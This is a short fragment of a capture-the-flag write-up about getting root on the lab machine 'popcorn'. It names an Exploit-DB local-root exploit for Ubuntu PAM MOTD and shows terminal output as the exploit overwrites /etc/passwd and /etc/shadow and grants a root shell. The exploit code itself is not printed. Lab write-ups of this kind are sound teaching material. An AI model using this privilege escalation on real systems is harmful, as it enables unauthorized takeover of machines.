4 manual privesc > root

www-data@popcorn:/home/george$ find . -type f -ls
    76    4 -rw-r--r--   1 george   george        220 Mar 17  2017 ./.bash_logout
    82    4 -rw-r--r--   1 george   george       3180 Mar 17  2017 ./.bashrc
 42885  832 -rw-r--r--   1 george   george     848727 Mar 17  2017 ./torrenthoster.zip
 42883    0 -rw-r--r--   1 george   george          0 Mar 17  2017 ./.cache/motd.legal-displayed
 42884    0 -rw-r--r--   1 george   george          0 Mar 17  2017 ./.sudo_as_admin_successful
  2210    4 -rw-r--r--   1 george   george         33 Sep 10 00:32 ./user.txt
 43648    4 -rw-------   1 root     root           19 May  5  2017 ./.nano_history
 44232    4 -rw-------   1 root     root         1571 Mar 17  2017 ./.mysql_history
   107    4 -rw-r--r--   1 george   george        675 Mar 17  2017 ./.profile
   
# file .cache/motd.legal-displayed is empty but never seen it before

Using https://www.exploit-db.com/exploits/14339

# had a lot of issues
www-data@popcorn:/var/www/torrent$ bash pam.sh
[*] Ubuntu PAM MOTD local root
'am.sh: line 39: syntax error near unexpected token `{
'am.sh: line 39: `backup() {

# running dos2unix
$ dos2unix 14339
dos2unix: converting file 14339 to Unix format...

www-data@popcorn:/var/www/torrent$ bash k.sh
[*] Ubuntu PAM MOTD local root
[*] SSH key set up
[*] spawn ssh
[+] owned: /etc/passwd
[*] spawn ssh
[+] owned: /etc/shadow
[*] SSH key removed
[+] Success! Use password toor to get root
Password:
root@popcorn:/var/www/torrent# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

Last updated